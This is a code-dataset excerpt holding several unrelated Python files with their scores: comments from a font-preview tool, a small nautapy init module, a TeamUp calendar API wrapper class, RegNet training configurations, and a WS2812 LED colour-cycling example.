the source outline in the current window. I don't know how to solve this.</li> <li>Improvement?: Add options to scale the source font.</li> <li>Improvement?: Set different colors, fill settings for each font?</li> </ul> # Fixed width of the window. ################ # OBSERVERS AND UPDATERS ################ ################ # CONTEXTS ################ Update the font list. Resets the view to the currently opened fonts. Open a font without UI and add it to the font list. The UI # Populating the view can only happen after the view is attached to the window, # or else the relative widths go wrong. # Flag to see if the selection list click is in progress. We are resetting the selection # ourselves, using the list "buttons", but changing that selection will cause another # list update, that should be ignored. # Indicate that we are a drawing module #value=getExtensionDefault("%s.%s" %(self.DEFAULTKEY, "fill"), True), #value=getExtensionDefault("%s.%s" %(self.DEFAULTKEY, "stroke"), False), #view.contextLabel = TextBox((C.C2, -58, 90, 50), 'Contexts', sizeStyle=C.STYLE_LABELSIZE) #view.contextUandlc = CheckBox((C.C2+170, -60, 85, 22), "Match Case", sizeStyle=C.STYLE_CHECKBOXSIZE, # value = False, # callback=self.contextEditCallback) If there is a selection, toggle the status of these fonts. # Avoid recursive loop because of changing font selection # If shift is held when pressing an entry in the font list, # the non-selected fonts will swap with the current's state # Avoid recursive loop because of changing font selection There is an experimental feature that will change the case of the context characters based on the case of the current glyph. But I'm disabling that for now. #def isUpper(self, g): # char = CharacterTX.glyph2Char(g) # if len(char) > 1: # char = char[0] # if unicodedata.category(char) == 'Lu': # return True # return False #def isLower(self, g): # char = CharacterTX.glyph2Char(g) # if len(char) > 1: # char = char[0] # if unicodedata.category(char) == 'Ll': # return True # return False Draw the background of defined glyphs and fonbts. Scale is available as mouse.scale. # Get the fonts from the list and see if they are selected. #There is an experimental feature that will change the case of the context characters based on the case of the current glyph. But I'm disabling that for now. if view.contextUandlc.get(): caseTransform = None if self.isUpper(glyph): caseTransform = FontTX.unicodes.getUpperFromLower elif self.isLower(glyph): caseTransform = FontTX.unicodes.getLowerFromUpper if caseTransform: for i, g in enumerate(contextBefore): newG = caseTransform(g) if newG is not None: contextBefore[i] = newG newG = caseTransform(sourceGlyph) if newG is not None: sourceGlyph = newG if caseTransform: for i, g in enumerate(contextAfter): newG = caseTransform(g) if newG is not None: contextAfter[i] = newG # Uncomment to activate kerning. Requires FontTX. #kernValue += FontTX.kerning.getValue((previousGlyph.name, cbGlyph.name), font.kerning, font.groups) #kernValue = FontTX.kerning.getValue((cbGlyph.name, nextGlyph.name), font.kerning, font.groups) # Uncomment to activate kerning. Requires FontTX. #restore() Get the fonts in the list. Set the font list from the current set of open fonts. Change the color. Change the fill status. Change the stroke status. Change the alignment status. Get the alignment as a string. Get all fonts in a way that can be set into a vanilla list. # Set of all unique paths in the merges lists # If update flag is set, then keep the existing selected fonts. # If it is not already there, add this to the list ################ # CONTEXTS ################ #if sender.get(): #sender.set(sender.get()[0]) | 1.961254 | 2 |
nautapy/__init__.py | armandofcom/nautapy | 25 | 10384 | <gh_stars>10-100
import os
appdata_path = os.path.expanduser("~/.local/share/nautapy")
os.makedirs(appdata_path, exist_ok=True)
| import os
appdata_path = os.path.expanduser("~/.local/share/nautapy")
os.makedirs(appdata_path, exist_ok=True) | none | 1 | 1.599525 | 2 |
|
pyteamup/Calendar.py | LogicallyUnfit/pyTeamUp | 5 | 10385 | import requests
import json
import datetime
import sys
from dateutil.parser import parse as to_datetime
try:
import pandas as pd
except:
pass
from pyteamup.utils.utilities import *
from pyteamup.utils.constants import *
from pyteamup.Event import Event
class Calendar:
def __init__(self, cal_id, api_key):
self.__calendar_id = cal_id
self.__api_key = api_key
self.__cal_base = f'/{cal_id}'
self.__token_str = f'?_teamup_token={self.api_key}'
self.__subcalendars = None
self.__valid_api = None
self.__configuration = None
self._base_url = BASE_URL + self.__cal_base
self._event_collection_url = self._base_url + EVENTS_BASE + self.__token_str
self._subcalendars_url = self._base_url + SUBCALENDARS_BASE + self.__token_str
self._check_access_url = BASE_URL + CHECK_ACCESS_BASE + self.__token_str
self.events_json = None
if not self.valid_api:
raise Exception(f'Invalid Api Key: {self.api_key}')
def __str__(self):
return self.calendar_id
@property
def api_key(self):
return self.__api_key
@property
def calendar_id(self):
return self.__calendar_id
@property
def valid_api(self):
"""Makes a request to the calendar to see if the api is valid"""
if not self.__valid_api:
req = requests.get(self._check_access_url)
try:
check_status_code(req.status_code)
self.__valid_api = True
except:
self.__valid_api = False
return self.__valid_api
else:
return None
@property
def configuration(self):
if self.__configuration is None:
print('Fetching configuration')
req = requests.get(self._base_url + CONFIGURATION_BASE + self.__token_str)
check_status_code(req.status_code)
self.__configuration = json.loads(req.text)['configuration']
return self.__configuration
@property
def subcalendars(self):
if not self.__subcalendars:
print('Fetching Subcalendars')
req = requests.get(self._subcalendars_url)
check_status_code(req.status_code)
self.__subcalendars = json.loads(req.text)['subcalendars']
return self.__subcalendars
def clear_calendar_cache(self):
self.__subcalendars = None
self.__configuration = None
def get_event_collection(self, start_dt=None, end_dt=None, subcal_id=None, returnas='events', markdown=False):
"""
Method allows bulk fetching of events that fall between the provided time frame. If None is provided then
the current date -30 and +180 days is used.
:param start_dt: if set as None then set as today minus 30 days
:param end_dt: if left as None then set as today plus 180 days
:param subcal_id: optional str or list-like if a different calendar should be queried
:return: json of events
"""
if returnas not in ('events', 'dataframe', 'dict'):
raise TypeError('Returnas not recognized. Recognized values: event, series, dict')
if start_dt is None:
start_dt = datetime.date.today() - datetime.timedelta(30)
if end_dt is None:
end_dt = datetime.date.today() + datetime.timedelta(180)
subcal_par = ''
if subcal_id:
if isinstance(subcal_id, (list, tuple)):
for id in subcal_id:
subcal_par += f'&subcalendarId[]={id}'
else:
subcal_par = f'&subcalendarId[]={subcal_id}'
if markdown == True:
para_markdown = '&format[]=markdown'
else:
para_markdown = ''
parameters = f'&startDate={start_dt.strftime("%Y-%m-%d")}&endDate={end_dt.strftime("%Y-%m-%d")}' + subcal_par + para_markdown
req = requests.get(self._event_collection_url + parameters)
check_status_code(req.status_code)
self.events_json = json.loads(req.text)['events']
if returnas == 'events':
return [Event(self, **event_dict) for event_dict in self.events_json]
elif returnas == 'dataframe' and 'pandas' in sys.modules:
return pd.DataFrame.from_records(self.events_json)
else:
return self.events_json
def _create_event_from_json(self, payload):
""" Lazy Creation of Event by passing a formatted payload"""
resp = requests.post(self._event_collection_url, data=payload, headers=POST_HEADERS)
try:
check_status_code(resp.status_code)
except:
print(payload)
print(resp.text)
raise
return resp.text
def get_event(self, event_id, returnas='event'):
if returnas not in ('event', 'series', 'dict'):
raise TypeError('Returnas not recognized. Recognized values: event, series, dict')
url = self._base_url + EVENTS_BASE + f'/{event_id}' + self.__token_str
resp = requests.get(url)
check_status_code(resp.status_code)
event_dict = json.loads(resp.text)['event']
if returnas == 'event':
return Event(self, **event_dict)
elif returnas == 'series' and 'pandas' in sys.modules:
return pd.Series(event_dict)
else:
return event_dict
def get_subcalendar(self):
raise NotImplementedError
def search_events(self):
raise NotImplementedError
def get_changed_events(self, modified_since, returnas='event'):
"""
Get changed events since given unix time
:param modified_since: <int> Unix timestamp, must be less than 30 days old
:param returnas: <str> `event` `series` `dict` are valid options
:return: Tuple of event list and returned timestamp
"""
if returnas not in ('event', 'series', 'dict'):
raise TypeError('Returnas not recognized. Recognized values: event, series, dict')
url = self._base_url + EVENTS_BASE + self.__token_str + '&modifiedSince=' + str(modified_since)
resp = requests.get(url)
check_status_code(resp.status_code)
events_json = json.loads(resp.text)['events']
timestamp = json.loads(resp.text)['timestamp']
if returnas == 'events':
return [Event(self, **event_dict) for event_dict in events_json], timestamp
elif returnas == 'dataframe' and 'pandas' in sys.modules:
return pd.DataFrame.from_records(events_json), timestamp
else:
return events_json, timestamp
def new_event(self, title, start_dt, end_dt, subcalendar_ids, all_day=False,
notes=None, location=None, who=None, remote_id=None, returnas='event'):
"""
Create a new event within a provided subcalendar. Can return as Event object, Series object, or Dictionary.
Undo_id not included with return unless returnas='event' in which case it is included with the returned Event Object
:param subcalendar_id: <str, int, or list-like> Required - the ID of the subcalendar within the calendar the event should be created in.
:param title: <str> Title of the event, must be
:param start_dt: <datetime> Start Datetime
:param end_dt: <datetime> End Datetime
:param all_day: <Bool> Allday or Not
:param notes: <str> HTML or Markdown formatted string detailing the Description
:param location: <str> Location of the event
:param who: <str>
:param remote_id: <str> Remote ID of the event, used to link the TeamUp event record to its source information
:param returnas: <str> `event` `series` `dict` are valid options
:return:
"""
if returnas not in ('event','dict','series'):
raise ValueError(f'Unrecognized returnas paramter: {returnas}')
if not isinstance(start_dt, datetime.datetime) or not isinstance(end_dt, datetime.datetime):
try:
start_dt = to_datetime(start_dt)
end_dt = to_datetime(end_dt)
except:
raise ValueError('Parse failed, please pass all dates as a datetime object')
if isinstance(subcalendar_ids, (str, int)):
subcalendar_ids = [subcalendar_ids]
if not isinstance(subcalendar_ids, (tuple, list)):
raise ValueError(f'Unrecognized Type: Subcalendar_ids type: {type(subcalendar_ids)}')
dict = {'remote_id': remote_id,
'title': title,
'subcalendar_ids': subcalendar_ids,
'start_dt': format_date(start_dt),
'end_dt': format_date(end_dt),
'all_day': all_day,
'notes': notes,
'location': location,
'who': who
}
resp_text = self._create_event_from_json(json.dumps(dict))
resp_dict = json.loads(resp_text)
event_dict = resp_dict['event']
undo_id = resp_dict['undo_id']
if returnas == 'event':
return Event(self, undo_id = undo_id, **event_dict)
elif returnas == 'series' and 'pandas' in sys.modules:
return pd.Series(event_dict)
else:
return event_dict
| import requests
import json
import datetime
import sys
from dateutil.parser import parse as to_datetime
try:
import pandas as pd
except:
pass
from pyteamup.utils.utilities import *
from pyteamup.utils.constants import *
from pyteamup.Event import Event
class Calendar:
def __init__(self, cal_id, api_key):
self.__calendar_id = cal_id
self.__api_key = api_key
self.__cal_base = f'/{cal_id}'
self.__token_str = f'?_teamup_token={self.api_key}'
self.__subcalendars = None
self.__valid_api = None
self.__configuration = None
self._base_url = BASE_URL + self.__cal_base
self._event_collection_url = self._base_url + EVENTS_BASE + self.__token_str
self._subcalendars_url = self._base_url + SUBCALENDARS_BASE + self.__token_str
self._check_access_url = BASE_URL + CHECK_ACCESS_BASE + self.__token_str
self.events_json = None
if not self.valid_api:
raise Exception(f'Invalid Api Key: {self.api_key}')
def __str__(self):
return self.calendar_id
@property
def api_key(self):
return self.__api_key
@property
def calendar_id(self):
return self.__calendar_id
@property
def valid_api(self):
"""Makes a request to the calendar to see if the api is valid"""
if not self.__valid_api:
req = requests.get(self._check_access_url)
try:
check_status_code(req.status_code)
self.__valid_api = True
except:
self.__valid_api = False
return self.__valid_api
else:
return None
@property
def configuration(self):
if self.__configuration is None:
print('Fetching configuration')
req = requests.get(self._base_url + CONFIGURATION_BASE + self.__token_str)
check_status_code(req.status_code)
self.__configuration = json.loads(req.text)['configuration']
return self.__configuration
@property
def subcalendars(self):
if not self.__subcalendars:
print('Fetching Subcalendars')
req = requests.get(self._subcalendars_url)
check_status_code(req.status_code)
self.__subcalendars = json.loads(req.text)['subcalendars']
return self.__subcalendars
def clear_calendar_cache(self):
self.__subcalendars = None
self.__configuration = None
def get_event_collection(self, start_dt=None, end_dt=None, subcal_id=None, returnas='events', markdown=False):
"""
Method allows bulk fetching of events that fall between the provided time frame. If None is provided then
the current date -30 and +180 days is used.
:param start_dt: if set as None then set as today minus 30 days
:param end_dt: if left as None then set as today plus 180 days
:param subcal_id: optional str or list-like if a different calendar should be queried
:return: json of events
"""
if returnas not in ('events', 'dataframe', 'dict'):
raise TypeError('Returnas not recognized. Recognized values: event, series, dict')
if start_dt is None:
start_dt = datetime.date.today() - datetime.timedelta(30)
if end_dt is None:
end_dt = datetime.date.today() + datetime.timedelta(180)
subcal_par = ''
if subcal_id:
if isinstance(subcal_id, (list, tuple)):
for id in subcal_id:
subcal_par += f'&subcalendarId[]={id}'
else:
subcal_par = f'&subcalendarId[]={subcal_id}'
if markdown == True:
para_markdown = '&format[]=markdown'
else:
para_markdown = ''
parameters = f'&startDate={start_dt.strftime("%Y-%m-%d")}&endDate={end_dt.strftime("%Y-%m-%d")}' + subcal_par + para_markdown
req = requests.get(self._event_collection_url + parameters)
check_status_code(req.status_code)
self.events_json = json.loads(req.text)['events']
if returnas == 'events':
return [Event(self, **event_dict) for event_dict in self.events_json]
elif returnas == 'dataframe' and 'pandas' in sys.modules:
return pd.DataFrame.from_records(self.events_json)
else:
return self.events_json
def _create_event_from_json(self, payload):
""" Lazy Creation of Event by passing a formatted payload"""
resp = requests.post(self._event_collection_url, data=payload, headers=POST_HEADERS)
try:
check_status_code(resp.status_code)
except:
print(payload)
print(resp.text)
raise
return resp.text
def get_event(self, event_id, returnas='event'):
if returnas not in ('event', 'series', 'dict'):
raise TypeError('Returnas not recognized. Recognized values: event, series, dict')
url = self._base_url + EVENTS_BASE + f'/{event_id}' + self.__token_str
resp = requests.get(url)
check_status_code(resp.status_code)
event_dict = json.loads(resp.text)['event']
if returnas == 'event':
return Event(self, **event_dict)
elif returnas == 'series' and 'pandas' in sys.modules:
return pd.Series(event_dict)
else:
return event_dict
def get_subcalendar(self):
raise NotImplementedError
def search_events(self):
raise NotImplementedError
def get_changed_events(self, modified_since, returnas='event'):
"""
Get changed events since given unix time
:param modified_since: <int> Unix timestamp, must be less than 30 days old
:param returnas: <str> `event` `series` `dict` are valid options
:return: Tuple of event list and returned timestamp
"""
if returnas not in ('event', 'series', 'dict'):
raise TypeError('Returnas not recognized. Recognized values: event, series, dict')
url = self._base_url + EVENTS_BASE + self.__token_str + '&modifiedSince=' + str(modified_since)
resp = requests.get(url)
check_status_code(resp.status_code)
events_json = json.loads(resp.text)['events']
timestamp = json.loads(resp.text)['timestamp']
if returnas == 'events':
return [Event(self, **event_dict) for event_dict in events_json], timestamp
elif returnas == 'dataframe' and 'pandas' in sys.modules:
return pd.DataFrame.from_records(events_json), timestamp
else:
return events_json, timestamp
def new_event(self, title, start_dt, end_dt, subcalendar_ids, all_day=False,
notes=None, location=None, who=None, remote_id=None, returnas='event'):
"""
Create a new event within a provided subcalendar. Can return as Event object, Series object, or Dictionary.
Undo_id not included with return unless returnas='event' in which case it is included with the returned Event Object
:param subcalendar_id: <str, int, or list-like> Required - the ID of the subcalendar within the calendar the event should be created in.
:param title: <str> Title of the event, must be
:param start_dt: <datetime> Start Datetime
:param end_dt: <datetime> End Datetime
:param all_day: <Bool> Allday or Not
:param notes: <str> HTML or Markdown formatted string detailing the Description
:param location: <str> Location of the event
:param who: <str>
:param remote_id: <str> Remote ID of the event, used to link the TeamUp event record to its source information
:param returnas: <str> `event` `series` `dict` are valid options
:return:
"""
if returnas not in ('event','dict','series'):
raise ValueError(f'Unrecognized returnas paramter: {returnas}')
if not isinstance(start_dt, datetime.datetime) or not isinstance(end_dt, datetime.datetime):
try:
start_dt = to_datetime(start_dt)
end_dt = to_datetime(end_dt)
except:
raise ValueError('Parse failed, please pass all dates as a datetime object')
if isinstance(subcalendar_ids, (str, int)):
subcalendar_ids = [subcalendar_ids]
if not isinstance(subcalendar_ids, (tuple, list)):
raise ValueError(f'Unrecognized Type: Subcalendar_ids type: {type(subcalendar_ids)}')
dict = {'remote_id': remote_id,
'title': title,
'subcalendar_ids': subcalendar_ids,
'start_dt': format_date(start_dt),
'end_dt': format_date(end_dt),
'all_day': all_day,
'notes': notes,
'location': location,
'who': who
}
resp_text = self._create_event_from_json(json.dumps(dict))
resp_dict = json.loads(resp_text)
event_dict = resp_dict['event']
undo_id = resp_dict['undo_id']
if returnas == 'event':
return Event(self, undo_id = undo_id, **event_dict)
elif returnas == 'series' and 'pandas' in sys.modules:
return pd.Series(event_dict)
else:
return event_dict
| en | 0.769907 | Makes a request to the calendar to see if the api is valid Method allows bulk fetching of events that fall between the provided time frame. If None is provided then the current date -30 and +180 days is used. :param start_dt: if set as None then set as today minus 30 days :param end_dt: if left as None then set as today plus 180 days :param subcal_id: optional str or list-like if a different calendar should be queried :return: json of events Lazy Creation of Event by passing a formatted payload Get changed events since given unix time :param modified_since: <int> Unix timestamp, must be less than 30 days old :param returnas: <str> `event` `series` `dict` are valid options :return: Tuple of event list and returned timestamp Create a new event within a provided subcalendar. Can return as Event object, Series object, or Dictionary. Undo_id not included with return unless returnas='event' in which case it is included with the returned Event Object :param subcalendar_id: <str, int, or list-like> Required - the ID of the subcalendar within the calendar the event should be created in. :param title: <str> Title of the event, must be :param start_dt: <datetime> Start Datetime :param end_dt: <datetime> End Datetime :param all_day: <Bool> Allday or Not :param notes: <str> HTML or Markdown formatted string detailing the Description :param location: <str> Location of the event :param who: <str> :param remote_id: <str> Remote ID of the event, used to link the TeamUp event record to its source information :param returnas: <str> `event` `series` `dict` are valid options :return: | 2.620274 | 3 |
configs/regnet.py | roatienza/agmax | 2 | 10386 |
from . import constant
parameters = {
'RegNet' : { "lr": 0.1, "epochs": 100, "weight_decay": 5e-5, "batch_size": 128, "nesterov": True, "init_backbone":True, "init_extractor":True,},
}
backbone_config = {
"RegNetX002" : {"channels": 3, "dropout": 0.2,},
"RegNetY004" : {"channels": 3, "dropout": 0.2,},
}
train = {
# RegNetX002
'RegNetX002-standard': { "backbone": 'RegNetX002',
"backbone_config": backbone_config['RegNetX002'],
"weights_std": constant.standard_weights_std,
"agmax" : False,
"parameters" : parameters['RegNet'],
"cutout": False, "auto_augment": False, "no_basic_augment": False, "cutmix": False, "mixup" : False,
},
'RegNetX002-cutmix': { "backbone": 'RegNetX002',
"backbone_config": backbone_config['RegNetX002'],
"weights_std": constant.standard_weights_std,
"agmax" : False,
"parameters" : parameters['RegNet'],
"cutout": False, "auto_augment": False, "no_basic_augment": False, "cutmix": True, "mixup" : False,
},
'RegNetX002-standard-agmax': { "backbone": 'RegNetX002',
"backbone_config": backbone_config['RegNetX002'],
"weights_std": constant.agmax_weights_std,
"agmax" : True,
"parameters" : parameters['RegNet'],
"cutout": False, "auto_augment": False, "no_basic_augment": False, "cutmix": False, "mixup" : False,
},
'RegNetX002-auto_augment-cutmix-agmax': { "backbone": 'RegNetX002',
"backbone_config": backbone_config['RegNetX002'],
"weights_std": constant.agmax_weights_std,
"agmax" : True,
"parameters" : parameters['RegNet'],
"cutout": False, "auto_augment": True, "no_basic_augment": False, "cutmix": True, "mixup" : False,
},
'RegNetX002-auto_augment-mixup-agmax': { "backbone": 'RegNetX002',
"backbone_config": backbone_config['RegNetX002'],
"weights_std": constant.agmax_weights_std,
"agmax" : True,
"parameters" : parameters['RegNet'],
"cutout": False, "auto_augment": True, "no_basic_augment": False, "cutmix": False, "mixup" : True,
},
'RegNetX002-auto_augment-cutmix': { "backbone": 'RegNetX002',
"backbone_config": backbone_config['RegNetX002'],
"weights_std": constant.standard_weights_std,
"agmax" : False,
"parameters" : parameters['RegNet'],
"cutout": False, "auto_augment": True, "no_basic_augment": False, "cutmix": True, "mixup" : False,
},
'RegNetX002-auto_augment-mixup': { "backbone": 'RegNetX002',
"backbone_config": backbone_config['RegNetX002'],
"weights_std": constant.standard_weights_std,
"agmax" : False,
"parameters" : parameters['RegNet'],
"cutout": False, "auto_augment": True, "no_basic_augment": False, "cutmix": False, "mixup" : True,
},
# RegNetY004
'RegNetY004-standard': { "backbone": 'RegNetY004',
"backbone_config": backbone_config['RegNetY004'],
"weights_std": constant.standard_weights_std,
"agmax" : False,
"parameters" : parameters['RegNet'],
"cutout": False, "auto_augment": False, "no_basic_augment": False, "cutmix": False, "mixup" : False,
},
'RegNetY004-cutmix': { "backbone": 'RegNetY004',
"backbone_config": backbone_config['RegNetY004'],
"weights_std": constant.standard_weights_std,
"agmax" : False,
"parameters" : parameters['RegNet'],
"cutout": False, "auto_augment": False, "no_basic_augment": False, "cutmix": True, "mixup" : False,
},
'RegNetY004-standard-agmax': { "backbone": 'RegNetY004',
"backbone_config": backbone_config['RegNetY004'],
"weights_std": constant.agmax_weights_std,
"agmax" : True,
"parameters" : parameters['RegNet'],
"cutout": False, "auto_augment": False, "no_basic_augment": False, "cutmix": False, "mixup" : False,
},
'RegNetY004-auto_augment-cutmix-agmax': { "backbone": 'RegNetY004',
"backbone_config": backbone_config['RegNetY004'],
"weights_std": constant.agmax_weights_std,
"agmax" : True,
"parameters" : parameters['RegNet'],
"cutout": False, "auto_augment": True, "no_basic_augment": False, "cutmix": True, "mixup" : False,
},
'RegNetY004-auto_augment-mixup-agmax': { "backbone": 'RegNetY004',
"backbone_config": backbone_config['RegNetY004'],
"weights_std": constant.agmax_weights_std,
"agmax" : True,
"parameters" : parameters['RegNet'],
"cutout": False, "auto_augment": True, "no_basic_augment": False, "cutmix": False, "mixup" : True,
},
'RegNetY004-auto_augment-cutmix': { "backbone": 'RegNetY004',
"backbone_config": backbone_config['RegNetY004'],
"weights_std": constant.standard_weights_std,
"agmax" : False,
"parameters" : parameters['RegNet'],
"cutout": False, "auto_augment": True, "no_basic_augment": False, "cutmix": True, "mixup" : False,
},
'RegNetY004-auto_augment-mixup': { "backbone": 'RegNetY004',
"backbone_config": backbone_config['RegNetY004'],
"weights_std": constant.standard_weights_std,
"agmax" : False,
"parameters" : parameters['RegNet'],
"cutout": False, "auto_augment": True, "no_basic_augment": False, "cutmix": False, "mixup" : True,
},
}
|
from . import constant
parameters = {
'RegNet' : { "lr": 0.1, "epochs": 100, "weight_decay": 5e-5, "batch_size": 128, "nesterov": True, "init_backbone":True, "init_extractor":True,},
}
backbone_config = {
"RegNetX002" : {"channels": 3, "dropout": 0.2,},
"RegNetY004" : {"channels": 3, "dropout": 0.2,},
}
train = {
# RegNetX002
'RegNetX002-standard': { "backbone": 'RegNetX002',
"backbone_config": backbone_config['RegNetX002'],
"weights_std": constant.standard_weights_std,
"agmax" : False,
"parameters" : parameters['RegNet'],
"cutout": False, "auto_augment": False, "no_basic_augment": False, "cutmix": False, "mixup" : False,
},
'RegNetX002-cutmix': { "backbone": 'RegNetX002',
"backbone_config": backbone_config['RegNetX002'],
"weights_std": constant.standard_weights_std,
"agmax" : False,
"parameters" : parameters['RegNet'],
"cutout": False, "auto_augment": False, "no_basic_augment": False, "cutmix": True, "mixup" : False,
},
'RegNetX002-standard-agmax': { "backbone": 'RegNetX002',
"backbone_config": backbone_config['RegNetX002'],
"weights_std": constant.agmax_weights_std,
"agmax" : True,
"parameters" : parameters['RegNet'],
"cutout": False, "auto_augment": False, "no_basic_augment": False, "cutmix": False, "mixup" : False,
},
'RegNetX002-auto_augment-cutmix-agmax': { "backbone": 'RegNetX002',
"backbone_config": backbone_config['RegNetX002'],
"weights_std": constant.agmax_weights_std,
"agmax" : True,
"parameters" : parameters['RegNet'],
"cutout": False, "auto_augment": True, "no_basic_augment": False, "cutmix": True, "mixup" : False,
},
'RegNetX002-auto_augment-mixup-agmax': { "backbone": 'RegNetX002',
"backbone_config": backbone_config['RegNetX002'],
"weights_std": constant.agmax_weights_std,
"agmax" : True,
"parameters" : parameters['RegNet'],
"cutout": False, "auto_augment": True, "no_basic_augment": False, "cutmix": False, "mixup" : True,
},
'RegNetX002-auto_augment-cutmix': { "backbone": 'RegNetX002',
"backbone_config": backbone_config['RegNetX002'],
"weights_std": constant.standard_weights_std,
"agmax" : False,
"parameters" : parameters['RegNet'],
"cutout": False, "auto_augment": True, "no_basic_augment": False, "cutmix": True, "mixup" : False,
},
'RegNetX002-auto_augment-mixup': { "backbone": 'RegNetX002',
"backbone_config": backbone_config['RegNetX002'],
"weights_std": constant.standard_weights_std,
"agmax" : False,
"parameters" : parameters['RegNet'],
"cutout": False, "auto_augment": True, "no_basic_augment": False, "cutmix": False, "mixup" : True,
},
# RegNetY004
'RegNetY004-standard': { "backbone": 'RegNetY004',
"backbone_config": backbone_config['RegNetY004'],
"weights_std": constant.standard_weights_std,
"agmax" : False,
"parameters" : parameters['RegNet'],
"cutout": False, "auto_augment": False, "no_basic_augment": False, "cutmix": False, "mixup" : False,
},
'RegNetY004-cutmix': { "backbone": 'RegNetY004',
"backbone_config": backbone_config['RegNetY004'],
"weights_std": constant.standard_weights_std,
"agmax" : False,
"parameters" : parameters['RegNet'],
"cutout": False, "auto_augment": False, "no_basic_augment": False, "cutmix": True, "mixup" : False,
},
'RegNetY004-standard-agmax': { "backbone": 'RegNetY004',
"backbone_config": backbone_config['RegNetY004'],
"weights_std": constant.agmax_weights_std,
"agmax" : True,
"parameters" : parameters['RegNet'],
"cutout": False, "auto_augment": False, "no_basic_augment": False, "cutmix": False, "mixup" : False,
},
'RegNetY004-auto_augment-cutmix-agmax': { "backbone": 'RegNetY004',
"backbone_config": backbone_config['RegNetY004'],
"weights_std": constant.agmax_weights_std,
"agmax" : True,
"parameters" : parameters['RegNet'],
"cutout": False, "auto_augment": True, "no_basic_augment": False, "cutmix": True, "mixup" : False,
},
'RegNetY004-auto_augment-mixup-agmax': { "backbone": 'RegNetY004',
"backbone_config": backbone_config['RegNetY004'],
"weights_std": constant.agmax_weights_std,
"agmax" : True,
"parameters" : parameters['RegNet'],
"cutout": False, "auto_augment": True, "no_basic_augment": False, "cutmix": False, "mixup" : True,
},
'RegNetY004-auto_augment-cutmix': { "backbone": 'RegNetY004',
"backbone_config": backbone_config['RegNetY004'],
"weights_std": constant.standard_weights_std,
"agmax" : False,
"parameters" : parameters['RegNet'],
"cutout": False, "auto_augment": True, "no_basic_augment": False, "cutmix": True, "mixup" : False,
},
'RegNetY004-auto_augment-mixup': { "backbone": 'RegNetY004',
"backbone_config": backbone_config['RegNetY004'],
"weights_std": constant.standard_weights_std,
"agmax" : False,
"parameters" : parameters['RegNet'],
"cutout": False, "auto_augment": True, "no_basic_augment": False, "cutmix": False, "mixup" : True,
},
}
| en | 0.534218 | # RegNetX002 # RegNetY004 | 1.667898 | 2 |
examples/ws2812/main.py | ivankravets/pumbaa | 69 | 10387 | <filename>examples/ws2812/main.py
#
# @section License
#
# The MIT License (MIT)
#
# Copyright (c) 2016-2017, <NAME>
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation
# files (the "Software"), to deal in the Software without
# restriction, including without limitation the rights to use, copy,
# modify, merge, publish, distribute, sublicense, and/or sell copies
# of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
# This file is part of the Pumbaa project.
#
import board
from drivers import Ws2812
import time
PIXEL_MAX = 81
RED = PIXEL_MAX * b'\x00\xff\x00'
GREEN = PIXEL_MAX * b'\xff\x00\x00'
BLUE = PIXEL_MAX * b'\x00\x00\xff'
WS2812 = Ws2812(board.PIN_GPIO18)
while True:
print('Red.')
WS2812.write(RED)
time.sleep(0.5)
print('Green.')
WS2812.write(GREEN)
time.sleep(0.5)
print('Blue.')
WS2812.write(BLUE)
time.sleep(0.5)
| <filename>examples/ws2812/main.py
#
# @section License
#
# The MIT License (MIT)
#
# Copyright (c) 2016-2017, <NAME>
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation
# files (the "Software"), to deal in the Software without
# restriction, including without limitation the rights to use, copy,
# modify, merge, publish, distribute, sublicense, and/or sell copies
# of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
# This file is part of the Pumbaa project.
#
import board
from drivers import Ws2812
import time
PIXEL_MAX = 81
RED = PIXEL_MAX * b'\x00\xff\x00'
GREEN = PIXEL_MAX * b'\xff\x00\x00'
BLUE = PIXEL_MAX * b'\x00\x00\xff'
WS2812 = Ws2812(board.PIN_GPIO18)
while True:
print('Red.')
WS2812.write(RED)
time.sleep(0.5)
print('Green.')
WS2812.write(GREEN)
time.sleep(0.5)
print('Blue.')
WS2812.write(BLUE)
time.sleep(0.5)
